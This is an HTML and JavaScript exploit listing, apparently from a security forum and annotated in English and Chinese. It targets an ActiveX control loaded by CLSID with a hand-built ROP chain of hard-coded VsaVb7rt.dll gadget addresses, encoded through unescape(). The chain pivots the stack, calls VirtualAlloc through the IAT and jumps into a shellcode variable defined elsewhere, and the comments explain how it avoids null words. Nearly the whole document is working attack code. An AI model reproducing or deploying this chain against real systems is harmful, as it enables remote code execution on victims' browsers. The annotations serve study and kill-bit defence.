<!-- Instantiates an ActiveX control by CLSID. Nothing visible in this listing calls f() or touches this element, so the code path that drives the control and consumes the ROP chain must live elsewhere on the page. The gadgets in f() all come from VsaVb7rt.dll (per its comments), presumably a module this control loads; confirm in a debugger. Defensively, this CLSID is the identifier a kill-bit (Compatibility Flags) entry would target. -->
<object classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F'> </object>
<script>
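// Encode a 32-bit value as two little-endian %uXXXX escapes so that unescape()
// emits its four bytes in memory order (low word first, then high word), the
// same layout the hand-written gadget strings in f() use.
//
// base, offset: numbers whose sum is the value to encode. The sum is reduced to
//               its unsigned 32-bit form, so a negative or over-wide input wraps
//               instead of yielding a malformed escape (the original assumed a
//               non-negative value of at most 8 hex digits).
// Returns e.g. '%uefff%uffff' for 0xffffefff.
function l32(base, offset) {
  // >>> 0 forces an unsigned 32-bit integer; avoids "-1"-style hex output.
  var address = (base + offset) >>> 0;
  // Left-pad to exactly 8 hex digits (ES3-compatible; no padStart).
  var hex = ("00000000" + address.toString(16)).slice(-8);
  // All locals declared with var: the original leaked s/s1/s2 as implicit globals.
  var hi = hex.substring(0, 4);
  var lo = hex.substring(4, 8);
  return '%u' + lo + '%u' + hi;
}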
// Build the ROP chain (as a %u-escaped string) that is placed in front of
// `shellcode`. Every gadget address below is hard-coded for one specific
// VsaVb7rt.dll image (all are 0x5e2xxxxx), so the chain only works against that
// exact build and load address. Each dword is written low word first, the same
// little-endian layout l32() produces, and unescape() is the only decoder that
// understands %uXXXX (decodeURIComponent does not). `shellcode` is not defined
// in this listing; it must be a global set elsewhere on the page. No dword in the
// chain contains a 0x0000 word.
//
// Read together with the gadget comments, the chain appears to: pivot the stack
// onto this buffer (xchg eax,esp); count ecx from 0xFFFFFFFF up to 0x40 with
// repeated inc so that no null-containing constant is needed; produce 0x1001 in
// eax by negating 0xffffefff and copy it into ebx and edx; resolve VirtualAlloc
// through the IAT into esi; load jmp esp into ebp and a RETN into edi; then
// pushad so the saved registers form a VirtualAlloc call frame that returns into
// jmp esp, i.e. the classic pushad-based VirtualAlloc chain. The register-to-
// parameter mapping (ecx=0x40 presumably PAGE_EXECUTE_READWRITE, ebx/edx=0x1001
// as size/allocation type) is inferred from the comments; confirm in a debugger.
// Padding dwords marked "no use" are skipped by the `ret N` of the preceding
// gadget or popped into a register that is never read again.
function f()
{
// (the following line is a forum-encoded link reference rendered as bare text; it is not code)
// e5bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0G2M7s2y4Z5k6h3I4D9i4K6u0W2j5$3!0E0i4K6u0r3M7X3!0H3M7$3g2S2M7X3y4Z5i4K6y4r3K9q4)9K6c8r3f1@1y4X3b7@1z5r3p5%4k6X3f1&6y4U0p5@1x3o6q4X3x3h3y4T1k6U0R3#2y4e0x3I4j5$3c8X3x3o6g2V1i4K6t1$3M7q4)9K6c8r3&6W2k6#2)9J5b7X3g2Q4x3U0f1J5y4s2R3`.
return unescape("%u3270%u5e28"+ // pop ebx/ret
"%u19b1%u5e26"+ //first call xchg eax,esp/ret  -- stack pivot: eax must point at this chain when the first gadget runs
"%uf933%u5e34"+ //start to do somethin pop ecx/ret
"%uFFFF%uFFFF"+ //ecx==FFFFFFFF  (-1, so the inc below can reach a small value without a null word)
"%ub44b%u5e2c"+ // ecx=0 inc ecx/ret
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+ //ecx=0x40  (the exact inc count matters; do not "tidy" this line into a loop without recounting)
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
l32(0,0xfffff000-1)+ // 0xffffefff: negated by the next gadget to give 0x1001 without ever writing 0x00001000
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h  -- eax=0x1001; ret 10h skips the four padding dwords after the next gadget
"%u4141%u4141"+ //pop edi no use
"%u4241%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4  -- ebx=0x1001; ret 4 skips one padding dword
"%u4141%u4141"+ // skipped by ret 10h above
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+ // popped into ebp, never used
"%ub7cc%u5e34"+ // XOR EDX,EDX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+ // skipped by ret 4 above
"%ub5ee%u5e34"+ // ADD EDX,EBX // POP EBX // RETN 0x10[VsaVb7rt.dll]  -- edx=0x1001; ebx is clobbered here, hence the second neg round below
"%u4141%u4141"+ // popped into ebx (clobbered)
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+ // skipped by RETN 0x10 above
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
l32(0,0xfffff000-1)+ // 0xffffefff again, to rebuild ebx=0x1001
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4141%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4  -- ebx=0x1001
"%u4241%u4141"+ // skipped by ret 10h above (distinct marker values, presumably for debugging the stack layout)
"%u4242%u4141"+
"%u4243%u4141"+
"%u4244%u4141"+
"%u4245%u4141"+ // popped into ebp, overwritten below
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4245%u4141"+ // skipped by ret 4 above
"%u113c%u5e23"+ // ptr to &VirtualAlloc() [IAT VsaVb7rt.dll]
"%u2a5f%u5e2a"+ // MOV EAX,DWORD PTR DS:[EAX] // RETN [VsaVb7rt.dll]  -- eax=VirtualAlloc
"%u4536%u5e30"+ // XCHG EAX,ESI // RETN [VsaVb7rt.dll]  -- esi=VirtualAlloc
"%ubd6f%u5e28"+ // POP EBP // RETN [VsaVb7rt.dll]
"%u7050%u5e28"+ // & jmp esp [VsaVb7rt.dll]  -- becomes VirtualAlloc's return address after pushad
"%uff8d%u5e24"+ // POP EDI // RETN [VsaVb7rt.dll]
"%u315c%u5e28"+ // RETN (ROP NOP) [VsaVb7rt.dll]  -- first thing executed after pushad
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u9090%u9090"+ // nop  -- pushed last by pushad, so it sits just before shellcode when jmp esp lands
"%u22cc%u5e2f"+ // PUSHAD // RETN [VsaVb7rt.dll]  -- saved order edi,esi,ebp,esp,ebx,edx,ecx,eax forms the call frame
shellcode);
}
做这么复杂主要是因为 0x0000 的截断问题，所以这里避免在链中出现 %u0000。(The chain is this convoluted because a 0x0000 word truncates the payload, so every gadget address and constant is chosen so that no %u0000 appears — for example 0x1001 is produced by negating 0xffffefff rather than loading 0x00001000 directly, and ecx is reached by repeated inc from 0xFFFFFFFF.)